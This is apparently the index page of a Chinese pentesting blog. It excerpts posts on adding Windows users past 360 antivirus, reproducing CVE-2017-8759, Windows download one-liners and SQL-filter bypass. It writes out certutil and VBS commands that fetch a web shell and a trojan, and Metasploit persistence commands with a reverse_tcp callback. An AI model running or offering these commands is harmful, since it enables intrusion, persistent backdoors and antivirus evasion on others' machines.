【Pywin32】Python调用win32api来创建用户,提权

闲着没事做,尝试了一下,看先不能绕过360之类的

结果是在解释器解释的过程中,用户顺利添加了。360无任何提示

但是打包成EXE后,360就会拦截添加过程。

期待会有利用方式出来。感觉可以利用。

Continue reading “【Pywin32】Python调用win32api来创建用户,提权”

CVE-2017-8759完美复现.并且解决HTA,POWERSHELL弹框闪烁

#Team: Cola-Lab

TIPS:

发现很多朋友在BIN to RTF那里出现了问题,本人修改了下别人的脚本,利用创建RTF的函数重写了一个脚本

CreateRTF.py

usage:Test.py -f filename – u url
filename: output file name
url: http[s]://example.com/exploit.txt

Python3编写,直接生成可用的RTF


 

前几天出的0DAY,搜了下,国内几乎没有人复现,这个洞总体来说,危害很大,而且比CVE-2017-0199更难防御。

漏洞成因分析:

360:一个换行符引发的奥斯卡0day漏洞(CVE-2017-8759)重现:最新的Office高级威胁攻击预警

FireEye:FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY

本人尝试了下复现,的确有很多坑!国外的大牛们也没有把利用方式说的很完善。

Continue reading “CVE-2017-8759完美复现.并且解决HTA,POWERSHELL弹框闪烁”

整理一下Windows中下载的命令

一、bitsadmin

1、bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip

2、bitsadmin /rawreturn /transfer getpayload http://download.sysinternals.com/files/PSTools.zip c:\p.zip

3、bitsadmin /transfer myDownLoadJob /download /priority normal “http://download.sysinternals.com/files/PSTools.zip” “c:\p.zip”

有进度条

4、多条命令

bitsadmin /create myDownloadJob

bitsadmin /addfile myDownloadJob http://download.sysinternals.com/files/PSTools.zip c:\lcx.zip

bitsadmin /resume myDownloadJob

bitsadmin /info myDownloadJob /verbose

bitsadmin /complete myDownloadJob

二、certutil

certutil -urlcache -split -f http://www.baidu.com/shell.php ysf.php

三、powershell

 

 

 

这个psh脚本有很多方法

四、VBS

cscript wget.vbs http://www.jbzj.com/muma.exe

 

VBS同样也有很多方式

FreeForWenku–免费下载百度文库资料

链接: https://pan.baidu.com/s/1kVDWOxp 密码: 6vwb

使用方法 FreeForWenku TargetUrl Type

example:

FreeForWenku https://wenku.baidu.com/view/09f3e7c9a1c7aa00b52acb96.html?from=search  ppt

PPT,PDF会保存图片到文件夹

DOC,TXT会保存在文本中

最大可能的还原了格式。

源代码:

https://github.com/Lz1y/FreeForWenku

Python一个异常解决

json中中文是Unicode编码十分不方便。

用以下方法处理str即可打印中文

错误信息:

这是因为遇到了非法字符,例如:全角空格往往有多种不同的实现方式,比如\xa3\xa0,或者\xa4\x57,
这些字符,看起来都是全角空格,但它们并不是“合法”的全角空格
真正的全角空格是\xa1\xa1,因此在转码的过程中出现了异常。
而之前在处理新浪微博数据时,遇到了非法空格问题导致无法正确解析数据。

[解决办法]

#将获取的字符串strTxt做decode时,指明ignore,会忽略非法字符,

#当然对于gbk等编码,处理同样问题的方法是类似的

strTest = strTxt.decode(‘utf-8’, ‘ignore’)

return strTest

[补充]

默认的参数就是strict,代表遇到非法字符时抛出异常;
如果设置为ignore,则会忽略非法字符;
如果设置为replace,则会用?号取代非法字符;
如果设置为xmlcharrefreplace,则使用XML的字符引用。

参考来源  CSDN(不知原作者)

MSF多种维持后门回话的方法

渗透测试中,常常使用msf框架,不过他生成的shellcode只能一次性使用,重启之后就失效了。因此MSF也准备了两种

“持续性后门”

metasploit自带的后门有两种方式启动的,一种是通过服务启动(metsvc),一种是通过启动项启动(persistence) 优缺点各异。

metsvc是通过服务启动,但是服务名是meterpreter。

metsvc启动方式:

 

persistence使用方法

持久保持
当目标机器重启之后仍然可以控制
meterpreter> run persistence –X –i 50 –p 443 –r 192.168.1.111
-X 开机启动-i 连接超时时间–p 端口–rIP
下次连接时:
msf> use multi/handler
set payload windows/meterpreter/reverse_tcp
set LPOST 443
set LHOST 192.168.1.111
exploit
(会在以下位置和注册表以随机文件名写入文件等信息,如:
C:\Users\YourtUserName\AppData\Local\Temp\MXIxVNCy.vbs
C:\Users\YourtUserName\AppData\Local\Temp\radF871B.tmp\svchost.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DjMzwzCDaoIcgNP)

 

另外还有

其中REXENAME是拷贝到目标系统中的名字,REXEPATH是后门在本地的位置,STARTUP有USER、SYSTEM、SERVICE这三种取值。看参数就知道是啥意思了。

以及

这几句也可以达到同样效果,并且不会被杀软拦截

 

sql注入点过滤空格,+,/**/的情况下继续注入

在漏洞银行接了个任务。

目标存在注入,但是过滤了空格,+,/**/,URL编码

本人不咋会注入

在倾旋大佬的提示下,使用了延时盲注

payload:

E0是mysql的特性,相当于换行,用户语句连接处

但是这样子只能查询user(),database()等一些mysql默认系统函数,无法查询数据

后经过测试,这一段利用即可绕过空格达到查询的效果,配合盲注payload。

完整payload

即可查询表内数据